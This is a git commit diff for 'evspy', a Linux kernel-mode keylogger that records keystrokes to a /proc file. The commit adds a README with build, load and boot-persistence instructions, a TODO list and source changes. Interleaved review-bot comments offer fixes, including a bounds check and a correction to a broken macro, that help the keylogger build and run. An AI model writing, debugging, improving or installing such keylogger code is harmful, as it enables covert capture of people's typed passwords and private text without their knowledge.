authorGuillermo Ramos2011-09-09 16:10:56 +0200
committerGuillermo Ramos2011-09-09 16:10:56 +0200
commitcfaf177434cf38a59f893eda69c64ff458405230 (patch)
treeac3e305cc4e2a602ed5a0888f32cefde9474ac38
parent19f0515e3d0b9aef3729fbe5e454fd5d154475d4 (diff)
Añadidos README y TODO, comentarios varios (HEAD, master)
-rw-r--r--evspy/README47
-rw-r--r--evspy/TODO4
-rw-r--r--evspy/evspy.c19
-rw-r--r--evspy/evspy.h5
4 files changed, 61 insertions, 14 deletions
diff --git a/evspy/README b/evspy/README
new file mode 100644
index 0000000..cbc8d2f
--- /dev/null
+++ b/evspy/README
@@ -0,0 +1,47 @@
+** INTRO **
+
+Evspy is a general purpose kernel-mode keylogger in (early) development stage.
+
+The file from where you can read the registered keystrokes is /proc/driver/evspy
+by default. Only root can read it. Beware users: evspy can troll you.
+
+Don't be evil.
+
+
+** COMPILE **
+
+ $ make
+
+
+** LOAD **
+
+ # insmod evspy.ko
+
+
+** UNLOAD **
+
+ # rmmod evspy
+
+
+** IS IT ALREADY LOADED? **
+
+ $ lsmod | grep evspy
+
+
+** PERSISTENCE **
+
+If you want evspy to be loaded every time system boots, copy it into your
+kernel module dir:
+
+ # cp evspy.ko /lib/modules/$(uname -r)/kernel/drivers/input/evspy.ko
+
+and update module database:
+
+ # depmod -a
+
+(In some distros it could also be necessary to add it to some rc/config file)
+
+Once it has been installed, you can load it when you want with
+
+ # modprobe evspy
+
diff --git a/evspy/TODO b/evspy/TODO
new file mode 100644
index 0000000..7303bf8
--- /dev/null
+++ b/evspy/TODO
@@ -0,0 +1,4 @@
+* Fix backspace key (do not erase special key events) - Prio:Medium
+* Implement 2nd mapping (shift) - Prio:Medium
+* Take a look at kernel's circular list API - Prio:Low
+* Which FX key has been pressed? - Prio:None
diff --git a/evspy/evspy.c b/evspy/evspy.c
index 50af056..39e87f3 100644
--- a/evspy/evspy.c
+++ b/evspy/evspy.c
@@ -31,7 +31,6 @@
#include <linux/string.h>
#include <linux/cred.h>
#include <linux/sched.h>
-#include <asm/page.h>
#include "evspy.h"
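Review bot: Dropping `#include <asm/page.h>` leaves `EVS_BUFSIZE` in evspy.h expanding to `PAGE_SIZE` with no header in this file that is responsible for providing it. The build presumably still works because one of the remaining `<linux/...>` headers pulls the definition in, but that is a transitive dependency that can change between kernel versions. Either keep an explicit include for the page-size definition next to the macro that uses it (in evspy.h), or add a comment there naming the header that is relied on.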
@@ -46,8 +45,6 @@ static char sp_tag[] = "<+XXX>";
/*
* Executed when the procfs file is read (EVS_PROCNAME)
- *
- * TODO: Take a look at kernel's circular list implementation
*/
int evspy_read_proc(char *page, char **start, off_t offset, int count,
int *eof, void *data)
@@ -107,7 +104,7 @@ static void special_char(unsigned int code, unsigned int value)
int i;
int known = 1;
- // We don't care when some special keys are freed; add them here
+ // We need to know when some special keys are freed; add them here
switch(code) {
case KEY_LEFTSHIFT:
case KEY_RIGHTSHIFT:
@@ -158,12 +155,10 @@ static void special_char(unsigned int code, unsigned int value)
known = 0;
}
- if (!known && evs_isfX(code)) {
- // TODO: Which F key has been pressed? (by the way, who cares? ... )
+ if (!known && evs_isfX(code))
strncpy(sp_tag+2, "F??", 3);
- } else if (!known) {
+ else if (!known)
return;
- }
if (value == EVS_VAL_PRESS)
sp_tag[1] = '+';
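Review bot: The `strncpy(sp_tag+2, "F??", 3)` kept under the now brace-less `if` is used as a fixed-width overwrite, not a string copy: it writes exactly three bytes into the `XXX` slot of `"<+XXX>"` and relies on the existing `>` and terminator staying in place. `memcpy(sp_tag + 2, "F??", 3);` states that intent directly and avoids truncation warnings from newer compilers. A one-line comment such as `/* overwrite the 3-char key name inside "<+XXX>" */` would also help, since the tag layout is declared well above this point. special_char's body starts and ends outside the hunk.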
@@ -195,9 +190,8 @@ static void evspy_event(struct input_handle *handle, unsigned int type,
special_char(code, value);
// "Direct" keys (alphanumeric + some symbols)
- else if (value == EVS_VAL_PRESS) {
+ else if (value == EVS_VAL_PRESS)
evs_insert(map[code]);
- }
}
static int evspy_connect(struct input_handler *handler, struct input_dev *dev,
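Review bot: `evs_insert(map[code])` indexes the layout table directly with the event code, and no bound on `code` is visible in this hunk. Event codes are supplied by whatever input device is attached, so a code past the end of the table would be an out-of-bounds read in kernel context. evspy_event's body starts outside the hunk, so an earlier branch may already reject such codes; if it does not, guard the lookup, e.g. `else if (value == EVS_VAL_PRESS && code < ARRAY_SIZE(map))`, assuming `map` is a real array at this point rather than a pointer.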
@@ -212,7 +206,7 @@ static int evspy_connect(struct input_handler *handler, struct input_dev *dev,
handle->dev = dev;
handle->handler = handler;
- handle->name = "evspy";
+ handle->name = EVS_NAME;
error = input_register_handle(handle);
if (error)
@@ -249,7 +243,7 @@ static struct input_handler evspy_handler = {
.event = evspy_event,
.connect = evspy_connect,
.disconnect = evspy_disconnect,
- .name = "evspy",
+ .name = EVS_NAME,
.id_table = evspy_ids,
};
@@ -275,3 +269,4 @@ module_exit(evspy_exit);
MODULE_AUTHOR("Guillermo Ramos <0xwille@gmail.com>");
MODULE_DESCRIPTION("Event based keylogger");
MODULE_LICENSE("GPL");
+MODULE_VERSION("0.1");
diff --git a/evspy/evspy.h b/evspy/evspy.h
index 626dc2f..3df0c9e 100644
--- a/evspy/evspy.h
+++ b/evspy/evspy.h
@@ -2,10 +2,11 @@
#include <linux/input.h>
#include "maps.h"
+#define EVS_NAME "evspy" // driver name
#define EVS_MAP map_es // change this to your keyboard layout
#define EVS_TROLL 1 // clear this if you're a serious guy
-#define EVS_PROCNAME "driver/evspy" // virtual file within /proc
-#define EVS_BUFSIZE PAGE_SIZE // size of the circular buffer
+#define EVS_BUFSIZE PAGE_SIZE // size of the circular buffer (4K)
+#define EVS_PROCNAME "driver/" EVS // virtual file within /proc
#define MIN(x, y) (x) < (y) ? (x) : (y)
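Review bot: The new `EVS_PROCNAME` is defined as `"driver/" EVS`, but the macro added a few lines above is `EVS_NAME`, and nothing named `EVS` is defined in this hunk. Unless `EVS` is defined elsewhere, every use of `EVS_PROCNAME` will fail to compile. The line should read `#define EVS_PROCNAME "driver/" EVS_NAME // virtual file within /proc`. Separately, the added `(4K)` on `EVS_BUFSIZE` is only true where `PAGE_SIZE` is 4096; `// size of the circular buffer (one page)` stays accurate on every architecture.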